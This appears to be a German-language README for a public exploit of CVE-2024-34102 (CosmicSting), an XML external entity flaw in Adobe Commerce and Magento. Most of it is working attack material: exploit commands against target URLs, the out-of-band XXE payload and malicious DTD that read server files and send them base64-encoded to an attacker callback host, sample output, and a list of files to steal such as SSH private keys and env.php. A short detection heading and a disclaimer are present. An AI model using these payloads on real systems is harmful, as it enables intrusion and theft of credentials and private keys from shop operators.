
CVE-2024-34102 exploit for python3
Exploit für CVE-2024-34102 (CosmicSting) - XML External Entity (XXE) Schwachstelle in Adobe Commerce und Magento.
CVE-2024-34102 ist eine kritische XXE (XML External Entity) Schwachstelle, die folgende betrifft:
Diese Schwachstelle ermöglicht es einem nicht authentifizierten Angreifer:
CVSS-Score: 9.8 (Kritisch)
Dieser Exploit basiert auf den ursprünglichen Arbeiten von:
# Clone the repository
git clone https://github.com/YOUR_USERNAME/CVE-2024-34102.git
cd CVE-2024-34102
# Install dependencies
pip install -r requirements.txt
python3 exploit.py \
-u https://target.com \
-f /etc/passwd \
-c your-callback.oastify.com
Terminal 1 - DTD-Server:
sudo python3 server_dtd.py
Terminal 2 - Exploit:
python3 exploit.py \
-u https://target.com \
-f /etc/passwd \
-c your-callback.oastify.com \
--dtd-server YOUR-IP:8000
Terminal 1 - DTD-Server:
sudo python3 server_dtd.py
Terminal 2 - Callback-Server (automatische Dekodierung):
sudo python3 callback_server.py
Terminal 3 - Exploit:
python3 exploit.py \
-u https://target.com \
-f /etc/passwd \
-c YOUR-CALLBACK-IP \
--dtd-server YOUR-DTD-IP:8000
-u, --url - Ziel-URL (Basisdomain)-f, --file - Datei, die vom Server gelesen werden soll (z.B. /etc/passwd)-c, --callback - Callback-Server (IP/Domain)--dtd-server - Benutzerdefinierter Server zum Hosten der DTD-Datei--https - HTTPS für Callback verwenden (Standard: HTTP)python3 exploit.py \
-u https://vulnerable-site.com \
-f /etc/passwd \
-c abc123.oastify.com \
--dtd-server 192.168.1.100:8000
python3 exploit.py \
-u https://vulnerable-site.com \
-f /var/www/html/app/etc/env.php \
-c abc123.oastify.com \
--dtd-server 192.168.1.100:8000
python3 exploit.py \
-u https://vulnerable-site.com \
-f /home/ubuntu/.ssh/id_rsa \
-c abc123.burpcollaborator.net \
--dtd-server 192.168.1.100:8000 \
--https
Der Exploit verwendet die Out-of-Band-XXE-Technik, um Daten zu exfiltrieren:
<!-- Payload sent to target -->
<!DOCTYPE r [
<!ENTITY % sp SYSTEM "http://your-server/exploit.dtd">
%sp;
%param1;
]>
<r>&exfil;</r>
Der Zielserver lädt das bösartige DTD herunter:
<!ENTITY % data SYSTEM "php://filter/convert.base64-encode/resource=/etc/passwd">
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://callback/?exploited=%data;'>">
Der Server verarbeitet das XML, liest die Datei, kodiert sie in Base64 und sendet sie an den Callback:
GET /?exploited=cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaAo...
echo "cm9vdDp4OjA6MDpyb290Oi9yb290Oi9iaW4vYmFzaAo..." | base64 -d
[*] CosmicSting XXE Exploit (CVE-2024-34102)
[*] Target: https://vulnerable-site.com
[+] Callback Server: abc123.oastify.com
[+] Using custom DTD server: 192.168.1.100:8000
[+] DTD URL: http://192.168.1.100:8000/12ec6594.dtd?callback=abc123.oastify.com&file=/etc/passwd&protocol=http
DTD will be dynamically generated with:
[*] Callback: http://abc123.oastify.com
[*] File: /etc/passwd
DTD server is running? Ready to continue? [y/N]: y
[+] Target file: /etc/passwd
[+] Callback URL: http://abc123.oastify.com/?exploited=...
[*] Sending XXE payload to: https://vulnerable-site.com/rest/V1/guest-carts/1/estimate-shipping-methods
[*] Response status: 500
[!] Status 500 - This is normal! XXE may have triggered.
[!] Check your callback server for incoming requests.
[*] Waiting for callback (5 seconds)...
=== CHECK YOUR CALLBACK SERVER ===
[!] Monitor your callback service for incoming HTTP requests
[!] Expected request: http://abc123.oastify.com/?exploited=<base64_data>
To decode the exfiltrated data:
[*] echo 'BASE64_STRING' | base64 -d
[!] Check your Burp Collaborator or Oastify dashboard now!
Erkennung:
/rest/V1/guest-carts/*/estimate-shipping-methods<!ENTITY)Abwehrmaßnahmen:
Interessante Dateien zum Testen:
/etc/passwd
/var/www/html/app/etc/env.php
/var/www/html/app/etc/local.xml
/home/USER/.ssh/id_rsa
/var/log/apache2/access.log
/proc/self/environ
This exploit is provided for educational and security research purposes only.
Using this code to test systems without explicit authorization is ILLEGAL.
You are SOLELY responsible for your actions. Use only on:
✅ Your own test environments
✅ Authorized bug bounty programs
✅ Contracted penetration tests
DO NOT use on:
❌ Systems without authorization
❌ Production environments without permission
❌ Any malicious activity
The author is not responsible for misuse of this code.
⭐ Falls dieses Projekt nützlich war, erwägen Sie bitte, einen Stern zu vergeben!